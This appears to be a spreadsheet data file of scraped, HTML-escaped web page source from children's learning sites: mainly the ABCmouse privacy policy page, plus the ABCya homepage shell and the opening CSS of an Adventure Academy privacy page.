    &lt;/script&gt;
    &lt;body class="privacy_page privacy addline text_language_" onscroll="scrolltop();" onLoad=""&gt;    &lt;!-- pl 09302013 --&gt;
        &lt;div id="container"&gt;
            &lt;div id="header"&gt;
                &lt;div id="shortcut_link" class="block_display"&gt;
                    &lt;img id="shortcut_link_img" src="https://img.abcmouse.com/blank.png" data-realsrc="https://img.abcmouse.com/home/homepage/shortcut-icon.png" alt="" /&gt;  &lt;!--pl20150311  --&gt;
                    &lt;div id="shortcut_link_text"&gt;Create a Shortcut&lt;/div&gt;
                &lt;/div&gt;
                &lt;img id="main_mouse_logo" class="" src="https://img.abcmouse.com/blank.png" data-realsrc="https://img.abcmouse.com/com/abc_3_0/template/abcmouse_logo.png" alt="ABC mouse Early Learning Academy" /&gt;
                                    &lt;img id="kid_safe_link" class="" src="https://img.abcmouse.com/blank.png" data-realsrc="https://img.abcmouse.com/home/header/html5/kidsafe-desktop-v1-3x.png" alt="Child Safe Logo" /&gt;
                &lt;div id="homepage_header_links"&gt;
                    &lt;div id="homepage_header_top_links"&gt;
                        &lt;div tabindex="0" role="button" id="log_in_link" class="nmhp_header_button link-like block_display " &gt;Log In&lt;/div&gt;
                        &lt;div tabindex="0" role="button" id="current_members_login" class="no_display"&gt;Current Members&amp;nbsp;&amp;mdash;&amp;nbsp;&lt;/div&gt;
                        &lt;div tabindex="0" role="button" id="logout_link" class="nmhp_header_button link-like no_display "&gt;Log Out&lt;/div&gt;
                                                    &lt;div id="sign_up_link" tabindex="0" role="button" class="nmhp_header_button link-like block_display"&gt;Sign Up&lt;/div&gt;
                        &lt;!--</t>
  </si>
  <si>
    <t>&lt;div id="header_links_or" class="block_display"&gt;&amp;nbsp;or&amp;nbsp;&lt;/div&gt; --&gt;
                    &lt;/div&gt;
                    &lt;div id="spanish_toggle_link" class="link-like hidden"&gt;En Español&lt;/div&gt;
                    &lt;!--                    &lt;div id="schools_page_link" class="link-like block_display"&gt;Schools/Teachers&lt;/div&gt;    --&gt;
                    &lt;div id="back_to_home_link" class="link-like no_display"&gt;Back to Home&lt;/div&gt;
                    &lt;div tabindex="0" role="link" id="header_homepage_link" class="link-like block_display"&gt;Homepage&lt;/div&gt;
                      &lt;div id="schools_page_link" class="link-like block_display"&gt;Teachers&lt;/div&gt;
                &lt;/div&gt;
                &lt;div id="mobile_header_links"&gt;
                    &lt;div id="mobile_log_out" class="mobile_button no_display" &gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Log Out&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_back_to_home" class="mobile_button no_display" &gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Back to Home&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_straight_to_home" class="mobile_button no_display" &gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Home&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_sign_up" class="mobile_button block_display"&gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Sign Up&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_log_in" class="mobile_button block_display" &gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Log In&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_forgot_pwd" class="mobile_button block_display"&gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Forgot Password?&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_schools_link" class="mobile_button block_display"&gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Teachers&lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div id="mobile_homepage_link" class="mobile_button block_display"&gt;
                        &lt;div class="mobile_header_glare"&gt;&lt;/div&gt;
                        &lt;div class="mobile_header_btn_text"&gt;Homepage&lt;/div&gt;
                    &lt;/div&gt;
                                    &lt;/div&gt;
            &lt;/div&gt;&lt;!-- END header--&gt;
            &lt;div id="body"&gt;
                &lt;div id="main_frame" class="for27"&gt;
                    &lt;div id="main_frame_header"&gt;
                        &lt;div id="frame_title_html" class="aofl-font"&gt;
                            &lt;div id="frame_title_glare_overflow"&gt;&lt;div id="frame_title_glare"&gt;&lt;/div&gt;&lt;/div&gt;
                            &lt;div id="frame_title_html_text"&gt;&lt;img id="header_curriculum" src="https://img.abcmouse.com/regpath/html5/nmhp/first_grade_banner_icon_2-8_abcfont.png" alt="Full Online Curriculum: Preschool through Kindergarten"&gt;&lt;/div&gt;
                        &lt;/div&gt;
                    &lt;/div&gt;
               &lt;div id="main_frame_body"&gt;
	&lt;div id="policy_page_top"&gt;
		&lt;div id="policy_top_left_col"&gt;
		&lt;/div&gt;
	&lt;/div&gt;
	&lt;div id="top_link"&gt;
		&lt;a href="/privacy/previous/en/"&gt;Previous Privacy Policy: April 7, 2022&lt;/a&gt;
		&lt;span&gt; |&lt;/span&gt;
		&lt;a href="/privacy/current/es/"&gt;Política de privacidad en español&lt;/a&gt;
		&lt;/br&gt;&lt;a class="schools" href="https://img.abcmouse.com/pdf/privacy.pdf" target="_blank"&gt;Previous ABCmouse for Schools Privacy Policy: September 13, 2016&lt;/a&gt;	&lt;/div&gt;
	&lt;div id="top_print"&gt;
		&lt;a href="javascript:</t>
  </si>
  <si>
    <t>window.print();"&gt;Print This Page&lt;/a&gt;
	&lt;/div&gt;
	&lt;div id="top_row_level_header"&gt;
		&lt;div id="top_row_level_header_text" class="aofl-font"&gt;Privacy Policy&lt;/div&gt;
	&lt;/div&gt;
	&lt;div id="text_level_top_row"&gt;Effective Date: December 22, 2022&lt;/div&gt;
	&lt;div id="intro_text_level_top_row"&gt;&lt;/div&gt;
	&lt;div class="policyparagraph_text_row text_row_0"&gt;Welcome to ABCmouse.com&amp;reg; &lt;span class="italic"&gt;Early Learning Academy&lt;/span&gt; (&lt;span class="bold"&gt;ABCmouse&lt;/span&gt;), which is owned and operated by Age of Learning, Inc.</t>
  </si>
  <si>
    <t>We are committed to providing children with a learning environment where every activity is just as fun as it is educational and where you can feel confident that your children’s privacy is protected.&lt;/div&gt;&lt;div class="clear"&gt;&lt;/div&gt;&lt;div class="policyparagraph_text_row text_row_1"&gt;This Privacy Policy describes the ways in which Age of Learning, Inc., and its subsidiaries (collectively, &lt;span class="bold"&gt;we&lt;/span&gt;, &lt;span class="bold"&gt;our&lt;/span&gt;, &lt;span class="bold"&gt;us&lt;/span&gt;, or the &lt;span class="bold"&gt;Company&lt;/span&gt;) collect, use, and disclose information about you and the children who use your Account through ABCmouse, and any other websites, applications, and online services (&lt;span class="bold"&gt;Apps&lt;/span&gt;) that link to this policy (collectively, the &lt;span class="bold"&gt;Services&lt;/span&gt;), including ABCmouse&amp;reg; for Schools.   We provide School Accounts (as defined below) for schools, school districts, licensed childcare facilities, or other licensed educational institutions or programs (each, an &lt;span class="bold"&gt;Educational Institution&lt;/span&gt;). Our Services are directed toward preschool- through second grade-aged children.&lt;/div&gt;&lt;div class="clear"&gt;&lt;/div&gt;&lt;div class="policyparagraph_text_row text_row_2"&gt;&lt;span class="bold"&gt;Please read this Privacy Policy closely.&lt;/span&gt;</t>
  </si>
  <si>
    <t>By using the Services, you agree to the handling of your information in accordance with this Privacy Policy. If you provide us with your information (directly or indirectly through our service providers) we treat your information according to this Privacy Policy. We will only use your Personal Information in accordance with this Privacy Policy.</t>
  </si>
  <si>
    <t>If we need to use your Personal Information for any other purpose, other than as disclosed herein, we will update this Privacy Policy, as explained under &lt;a data-clickable="true" href="#section_12"&gt;Section 12 (Changes to Our Privacy Policy)&lt;/a&gt; below.&lt;/div&gt;&lt;div class="clear"&gt;&lt;/div&gt;
	&lt;div class="caption_text_row"&gt;Summary of Key Points&lt;/div&gt;
	&lt;div class="policy_intro" id="privacy_examples_intro"&gt;&lt;span class="paragraph-text"&gt;You should read this entire Privacy Policy and our &lt;a data-clickable="true" href="/tandc/current/en/"&gt;Terms &amp; Conditions&lt;/a&gt;, but here are some key points:&lt;/span&gt;		&lt;div class="clear" style="height:10px;"&gt;&lt;/div&gt;
		&lt;div id="items_row_col"&gt;
			&lt;ul&gt;
				&lt;li&gt;ABCmouse is certified under kidSAFE’s FTC approved COPPA Safe Harbor program. This means that the product has been independently, reviewed, and certified by kidSAFE to meet certain standards of online safety and privacy.&lt;/li&gt;&lt;li&gt;&lt;span</t>
  </si>
  <si>
    <t>class="bold"&gt;Personal Information&lt;/span&gt;, or &lt;span class="bold"&gt;PI&lt;/span&gt;, is defined in this policy to mirror the text of the California Consumer Privacy Act (&lt;span class="bold"&gt;CCPA&lt;/span&gt;) and means information that identifies, relates to, describes, is capable of being associated with, or could reasonably be linked, directly or indirectly, with a particular consumer or household.&lt;/li&gt;&lt;li&gt;We take your privacy seriously, and &lt;span class="bold"&gt;we never monetize your PI&lt;/span&gt;; we use it to enhance your experience with opportunities like special promotions and offers.&lt;/li&gt;&lt;li&gt; During ABCmouse registration, the only information we may ask you to provide about a child who will be using the Services is the child’s first name (or nickname), birth month and year, and gender. We also will ask you to choose an Academic Difficulty Level for each child.&lt;/li&gt;&lt;li&gt;Other than in the places and for the purposes explicitly disclosed in this Privacy Policy, we do not knowingly collect any PI directly from Child Users under age 13.&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>We do not ask for certain sensitive PI such as social security numbers, driver’s license numbers, or biometric data. However, paying subscribers are asked for payment information when they subscribe. Please see &lt;a data-clickable="true" href="#section_3"&gt;Section 3 (Information Collection)&lt;/a&gt; for more information about how we safeguard payment information.&lt;/li&gt;&lt;li&gt;Because the security of your PI is important to us, we only ask for PI where it serves a business purpose and try to limit the collection of PI to only what is necessary to accomplish those purposes.</t>
  </si>
  <si>
    <t>We also use commercially reasonable physical, technical, and administrative security measures designed to safeguard all information collected by the Services.&lt;/li&gt;&lt;li&gt;Our Services do not support social or federated login.&lt;/li&gt;&lt;li&gt;Adult Users (as defined below) may contact us or their Educational Institution, when applicable, at any time as described in  &lt;a data-clickable="true" href="#section_13"&gt;Section 13 (Contact Us)&lt;/a&gt; to request that we provide for their review, or delete from our records, any PI they have provided about Child Users associated with their Accounts, or to cease collecting PI from those Child Users. For information about when we automatically delete PI due to Account cancellation or inactivity, please see &lt;a data-clickable="true" href="#section_10"&gt;Section 10 (Location of Information Processing)&lt;/a&gt;.&lt;/li&gt;			&lt;/ul&gt;
		&lt;/div&gt;
		&lt;span class="bold underline"&gt;Additional Protections and Information for School Accounts&lt;/span&gt;&lt;div class="clear" style="height:10px;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;If you have access to the Services through a School Account, additional privacy protections apply because your Educational Institution may provide us with student personally identifiable information (&lt;span class="bold"&gt;Student Data&lt;/span&gt;) as defined by the Family Educational Rights and Privacy Act (20 U.S.C. § 1232g) and its implementing regulations (34 CFR Part 99) (collectively, &lt;span class="bold"&gt;FERPA&lt;/span&gt;) and applicable state laws. The Educational Institution is responsible for obtaining parental consent and/or ensuring that an exception applies prior to transferring Student Data to the Company, which acts as a third-party vendor school official in this context.&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>We will only access, collect, record, organize, use, or disclose (collectively, &lt;span class="bold"&gt;Process&lt;/span&gt;) Student Data collected through the Services as described in our agreement(s) with the applicable Educational Institution and this Privacy Policy. We will Process the data consistent with all applicable laws, including, but not limited to, FERPA.&lt;/li&gt;&lt;li&gt;We will delete, or if requested by the Educational Institution, transfer to the Educational Institution all Student Data within 90 days (or a shorter time frame if required by applicable law) following the termination of our agreement with the applicable Educational Institution.&lt;/li&gt;&lt;li&gt;We may de-identify Student Data received in connection with providing the Services and use such data as described in this Privacy Policy.&lt;/li&gt;&lt;/ul&gt;&lt;div class="clear" style="height:10px;"&gt;&lt;/div&gt;	&lt;/div&gt;
		&lt;div class="caption_text_row"&gt;Table of Contents&lt;/div&gt;
		&lt;div class="policy_intro_left" &gt;
			&lt;div id="content_items_row_left_col"&gt;
				&lt;ol class="table_of_contents_list"&gt;
					&lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_1"&gt;COPPA Safe Harbor&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_2"&gt;Types of Accounts, Services, and Users&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_3"&gt;Information Collection&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_4"&gt;How We Use Information&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true"</t>
  </si>
  <si>
    <t xml:space="preserve">href="#section_5"&gt;When We Disclose Information to Third&lt;br/&gt;Parties&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_6"&gt;How to Access, Change, or Delete&lt;/br&gt;Account Information&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_7"&gt;Account Cancellation and Reactivation;&lt;/br&gt;Data Deletion&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;				&lt;/ol&gt;
			&lt;/div&gt;
		&lt;/div&gt;
		&lt;div class="policy_intro_right table_of_contents_list" &gt;
			&lt;div id="content_items_row_right_col"&gt;
				&lt;ol start="8" class="table_of_contents_list"&gt;
					&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_8"&gt;California Privacy Rights&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_9"&gt;Links to Other Services&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_10"&gt;Location of Information Processing&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_11"&gt;Security&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_12"&gt;Changes to Our Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a data-clickable="true" href="#section_13"&gt;Contact Us&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;				&lt;/ol&gt;
			</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
		&lt;/div&gt;
		&lt;div class="clear" style="height:10px;"&gt;&lt;/div&gt;
		&lt;div id="policy_div"&gt;
			&lt;div class="policy_contents" id="privacy_examples_intro"&gt;
				&lt;div id="items_row_col"&gt;
					&lt;div id="main_sections"&gt;
						            &lt;p id="section_1"&gt;
                &lt;span class="bold"&gt;1.&lt;/span&gt;
                &lt;span class="title"&gt;COPPA Safe Harbor&lt;/span&gt;
            &lt;/p&gt;&lt;p class=""&gt;ABCmouse is part of the kidSAFE Seal Program.  </t>
  </si>
  <si>
    <t>This means that the product has been independently, reviewed, and certified by kidSAFE to meet certain standards of online safety and privacy, and is authorized to display the kidSAFE Seal under kidSAFE’s FTC approved COPPA Safe Harbor program.   Under the kidSAFE program users can also report concerns or complaints directly to kidSAFE through this link: &lt;a class="mobile-word-break" data-clickable="true" target="blank" href="https://www.kidsafeseal.com/certifiedproducts/abcmouse.html"&gt;https://www.kidsafeseal.com/certifiedproducts/abcmouse.html&lt;/a&gt;.&lt;/p&gt;
&lt;p class=""&gt;In addition, Child Users are blocked from accessing external links. External links will only be available if an Adult User enters his or her password.&lt;/p&gt;
            &lt;p id="section_2"&gt;
                &lt;span class="bold"&gt;2.&lt;/span&gt;
                &lt;span class="title"&gt;Types of Accounts, Services, and Users&lt;/span&gt;
            &lt;/p&gt;&lt;p class=""&gt;How we collect, use, and disclose information depends on the type of Account and the type of user.</t>
  </si>
  <si>
    <t>We currently offer the following types of Accounts through the Services: Family Accounts, Teacher Accounts, Classroom-Linked Accounts, Librarian Accounts, Guest Library Accounts, Personal Library Accounts, Library Home Checkout Accounts, and Community Center Accounts (collectively, &lt;span class="bold"&gt;Consumer and Other Accounts&lt;/span&gt;), which are described in our &lt;a data-clickable="true" href="/tandc/current/en/"&gt;Terms &amp; Conditions&lt;/a&gt;.&lt;/p&gt;
&lt;p class=""&gt;We also provide School Accounts, which are only for Educational Institutions. Consumer and Other Accounts and School Accounts are collectively referred to as &lt;span class="bold"&gt;Accounts&lt;/span&gt;, and the provisions of this policy apply to all Accounts. Any difference in how the Consumer and Other Accounts and School Accounts are treated is identified below.&lt;/p&gt;
&lt;p class=""&gt;Users of the Services include &lt;span class="bold"&gt;Child Users&lt;/span&gt; (any child under age 18 who uses the learning portion of the Services) and &lt;span class="bold"&gt;Adult Users&lt;/span&gt; (including parents and legal guardians of Child Users, Gift Account purchasers, teachers, librarians, and community center administrators), collectively referred to as &lt;span class="bold"&gt;Users&lt;/span&gt;.&lt;/p&gt;
            &lt;p id="section_3"&gt;
                &lt;span class="bold"&gt;3.&lt;/span&gt;
                &lt;span class="title"&gt;Information Collection&lt;/span&gt;
            &lt;/p&gt;&lt;p</t>
  </si>
  <si>
    <t xml:space="preserve">class=""&gt;There are two general categories of information that we collect.&lt;/p&gt;
            &lt;p id="section_3_a"&gt;
                &lt;span class="bold"&gt;A.&lt;/span&gt; &lt;span class="title"&gt;Information Users Provide to Us&lt;/span&gt;
                As more fully set forth below, we and our third-party service providers collect information that Users provide when using the Services, including when Adult Users create an Account, sign up for Services, or contact us with a question, comment, or request, and when Child Users participate in assessments. However, we will only use or disclose this information in accordance with this policy and applicable law. Please see &lt;a data-clickable="true" href="#section_5"&gt;Section 5 (When We Disclose Information to Third Parties)&lt;/a&gt; below for more information and how we limit disclosure of Child User information.
            </t>
  </si>
  <si>
    <t>&lt;/p&gt;            &lt;p id="section_3_a_1"&gt;
                &lt;span class="bold"&gt;&lt;/span&gt; &lt;span class="title"&gt;&lt;/span&gt;
                &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span class="underline"&gt;Adult Users&lt;/span&gt;
            &lt;/p&gt;&lt;p class="section_3_a_1_1"&gt;Adult Users are asked to provide certain PI about themselves when registering for any Account, including first and last name, em</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script&gt;!function(e,t,a,n,g){e[n]=e[n]||[],e[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"});var m=t.getElementsByTagName(a)[0],r=t.createElement(a);r.async=!0,r.src="https://www.googletagmanager.com/gtm.js?id=GTM-5VZ5QT",m.parentNode.insertBefore(r,m)}(window,document,"script","dataLayer")&lt;/script&gt;&lt;meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,maximum-scale=1,user-scalable=0"&gt;&lt;meta name="apple-mobile-web-app-capable" content="yes"&gt;&lt;meta name="google" content="notranslate"&gt;&lt;meta name="facebook-domain-verification" content="97sulv917xvbvhkvrhl0ggc1e4bnvp"&gt;&lt;meta name="apple-itunes-app" content="app-id=1079974015, affiliate-data=ct=SmartAppBanner&amp;amp;pt=355102"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"&gt;&lt;link rel="preload" href="/client/assets/montserrat-latin.preload-9da2eb1e4de855502f4d.woff2" as="font" crossorigin=""&gt;&lt;link rel="preload" href="/client/assets/bpreplay.preload-164a602e3a4e1ec2cdf6.woff2" as="font" crossorigin=""&gt;&lt;link rel="preload" href="/client/assets/bpreplay-bold.preload-0c410f17bd1c4a0d3348.woff2" as="font" crossorigin=""&gt;&lt;title&gt;ABCya! • Educational Computer Games and Apps for Kids&lt;/title&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="/client/assets/apple-touch-icon.png"&gt;&lt;link rel="icon" type="image/png" sizes="32x32" href="/client/assets/favicon-32x32.png"&gt;&lt;link rel="icon" type="image/png" sizes="16x16" href="/client/assets/favicon-16x16.png"&gt;&lt;link rel="manifest" href="/site.webmanifest"&gt;&lt;link rel="mask-icon" href="/client/assets/safari-pinned-tab.svg" color="#5bbad5"&gt;&lt;meta name="msapplication-TileColor" content="#00aba9"&gt;&lt;meta name="theme-color" content="#ffffff"&gt;&lt;script defer="defer" src="/client/runtime-d611308a760ac7bfa341.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="/client/strings-959b6b4e12717159aab2.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="/client/320-3703639d2e5a11b90b86.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="/client/main-ee76cdaf73db6aa35d96.js"&gt;&lt;/script&gt;&lt;link href="/client/main-e5bdfbd46bf5617c2757.css" rel="stylesheet"&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5VZ5QT" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;div id="root" class="root fixed-padding"&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US"&gt;&lt;head&gt;&lt;title&gt;Privacy Policy - Adventure Academy&lt;/title&gt;&lt;style&gt;/*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}[hidden],template{display:none}*,:after,:before{-webkit-box-sizing:border-box;box-sizing:border-box}@media screen and (orientation:landscape){@keyframes iosWebkitLandscape{0%{zoom:99.99999%}to{zoom:100%}}html{-webkit-animation:iosWebkitLandscape 1ms linear;animation: iosWebkitLandscape 1ms linear}}@media screen and (orientation:portrait){@keyframes iosWebkitPortrait{0%{zoom:100.00001%}to{zoom:100%}}html{-webkit-animation:iosWebkitPortrait 1ms linear;animation:</t>
  </si>
  <si>
    <t>iosWebkitPortrait 1ms linear}}html{-webkit-box-sizing:border-box;box-sizing:border-box;font-size:62.5%;background-color:#fff}body,html{height:100%}body{color:#4e4e4e;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;font-family:Arial,Helvetica,sans-serif;font-size:1.6rem;font-weight:400;line-height:1.15;width:100vw}route-view{display:none}route-view.loaded{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-flex:1;-ms-flex:1 auto;flex:1 auto;position:relative;width:100%}@media only screen and (max-width:1024px){html{font-size:.9765625vw}}@media only screen and (max-width:568px){html{font-size:1.76056338028169vw}}html.is-nmhp{font-size:.5210505vw}html.is-new-layout,html.is-nmhp{overflow-x:hidden}html.is-nmhp-blue-bg{background-color:#001852}html.blue-bg{background-color:#0a4996}.new-layout-bg{background-size:auto;-webkit-box-shadow:0 .7rem 1.5rem rgba(0,0,0,.8);box-shadow:0 .7rem 1.5rem rgba(0,0,0,.8)}.new-layout-content{background-size:contain}.new-u-br:after{content:"\A";white-space:pre}.new-u-hide{display:none}@media screen and (min-width:1920px){html.is-nmhp{font-size:10px}}@media screen and (min-width:3400px){html.is-new-layout{font-size:10px}}@media only screen and (max-width:1480px){html.is-new-layout{overflow-x:hidden;font-size:.6756756757vw}.new-layout-bg,.new-layout-content{background-size:100%}}@media only screen and (max-width:768px){html.is-new-layout,html.is-nmhp{font-size:1.302085vw}.new-u-br:after{content:""}.new-u-hide{display:block}}@supports (-ms-ime-align:auto){@media only screen and (max-width:1480px){.new-layout-bg,.new-layout-content{background-size:contain}}}::-webkit-input-placeholder{color:#6e6e6e;font-weight:lighter}::-moz-placeholder{color:#6e6e6e;font-weight:lighter}:-ms-input-placeholder{color:#6e6e6e;font-weight:lighter}:-moz-placeholder{color:#6e6e6e;font-weight:lighter}*{--z-index-1:1000;--z-index-2:2000;--z-index-3:3000;--z-index-4:4000;--z-index-5:5000;--z-index-6:6000;--z-index-7:7000;--z-index-8:8000;--z-index-9:9000;--z-index-10:10000}@font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:local("Montserrat Regular"),local("Montserrat-Regular"),url(/bc3aa95.woff2) format("woff2"),url(/8102c48.woff) format("woff")}@font-face{font-family:Montserrat;font-style:normal;font-weight:900;src:local("Montserrat Black"),local("Montserrat-Black"),url(/58cd789.woff2) format("woff2"),url(/26d42c9.woff) format("woff")}@font-face{font-family:Montserrat;font-style:normal;font-weight:700;src:local("Montserrat Bold"),local("Montserrat-Bold"),url(/39d93cf.woff2) format("woff2"),url(/80f10bd.woff) format("woff")}@font-face{font-family:Neuton;font-style:normal;font-weight:400;src:local("Neuton Regular"),local("Neuton-Regular"),url(/87b4ca1.woff2) format("woff2"),url(/89e63b0.woff) format("woff")}@font-face{font-family:Neuton;font-style:normal;font-weight:700;src:local("Neuton Bold"),local("Neuton-Bold"),url(/8ae5fd3.woff2) format("woff2"),url(/332cc96.woff) format("woff")}@font-face{font-family:Alegreya;font-style:normal;font-weight:400;src:local("Alegreya Regular"),local("Alegreya-Regular"),url(/1bf2b20.woff2) format("woff2"),url(/c86584c.woff) format("woff"),url(/fd87244.ttf) format("truetype")}@font-face{font-family:Alegreya;font-style:normal;font-weight:700;src:local("Alegreya Bold"),local("Alegreya-Bold"),url(/9106766.woff2) format("woff2"),url(/c5c37be.woff) format("woff"),url(/55d6ded.ttf) format("truetype")}@font-face{font-family:Alegreya;font-style:normal;font-weight:800;src:local("Alegreya ExtraBold"),local("Alegreya-ExtraBold"),url(/39d285c.woff2) format("woff2"),url(/e8b0a8b.woff) format("woff"),url(/0f66581.ttf) format("truetype")}@font-face{font-family:Alegreya Sans;font-style:normal;font-weight:400;src:local("Alegreya Sans Regular"),local("AlegreyaSans-Regular"),url(/d213a39.woff2) format("woff2"),url(/feb7904.woff) format("woff"),url(/d8499f8.ttf) format("truetype")}@font-face{font-family:Alegreya Sans;font-style:normal;font-weight:700;src:local("Alegreya Sans Bold"),local("AlegreyaSans-Bold"),url(/e596fe4.woff2) format("woff2"),url(/fe55488.woff) format("woff"),url(/1279766.ttf) format("truetype")}@font-face{font-family:Alegreya Sans;font-style:normal;font-weight:800;src:local("Alegreya Sans ExtraBold"),local("AlegreyaSans-ExtraBold"),url(/1f5fb4f.woff2) format("woff2"),url(/fbda83e.woff) format("woff"),url(/dcef80c.ttf) format("truetype")}@font-face{font-family:Alegreya Sans;font-style:normal;font-weight:900;src:local("Alegreya Sans Black"),local("AlegreyaSans-Black"),url(/a7fecdd.woff2) format("woff2"),url(/2a58095.woff) format("woff"),url(/e98105a.ttf) format("truetype")}@font-face{font-family:abcmouseSans;src:url(/2d8b3b3.woff);font-weight:700;font-style:normal}@font-face{font-family:abcmouseSans;src:url(/7e0c212.woff);font-weight:700;font-style:italic}@font-face{font-family:abcmouseSans;src:url(/becc018.woff);font-weight:100;font-style:normal}@font-face{font-family:abcmouseSans;src:url(/af49e84.woff);font-weight:100;font-style:italic}@font-face{font-family:abcmouseSans;src:url(/932cee7.woff);font-weight:300;font-style:normal}@font-face{font-family:abcmouseSans;src:url(/7ee54ab.woff);font-weight:300;font-style:italic}@font-face{font-family:abcmouseSans;src:url(/6e1c912.woff);font-weight:500;font-style:normal}@font-face{font-family:abcmouseSans;src:url(/0c598f7.woff);font-weight:500;font-style:italic}#simple-modal-container{position:fixed;top:0;bottom:0;right:0;left:0;z-index:100000000}.title{border-bottom:.06896em solid #004396;color:#004396;font-size:2.9rem;padding-bottom:2.2rem;margin-bottom:1.6rem}@media only screen and (max-width:568px){:host .title{padding-bottom:1.5rem;text-align:center}}#captcha-modal{-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;z-index:10000;display:-webkit-box;display:-ms-flexbox;display:flex;left:50%;top:50%;position:fixed;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);width:56.5rem;background:#fff;border-top-left-radius:2rem;border-top-right-radius:2rem;border-bottom-left-radius:3rem;border-bottom-right-radius:3rem}#px-captcha{margin:0 3rem 3rem}#verify{margin-top:2rem;font-size:2.8rem}#captcha-content{-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;border:.7rem solid #006bff;padding:4rem;border-bottom-left-radius:3rem;border-bottom-right-radius:3rem}#captcha-content,#captcha-modal-header.blue{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center}#captcha-modal-header.blue{border-top-left-radius:2rem;border-top-right-radius:2rem;color:#fff;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;height:10.7rem;font-weight:700;margin-bottom:-1px;padding:0 1.1rem 0 2rem;font-size:5.8rem;-webkit-box-shadow:none;box-shadow:none;background-color:#006bff}&lt;/style&gt;&lt;meta charset="utf-8"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=1"&gt;&lt;meta name="google-site-verification" 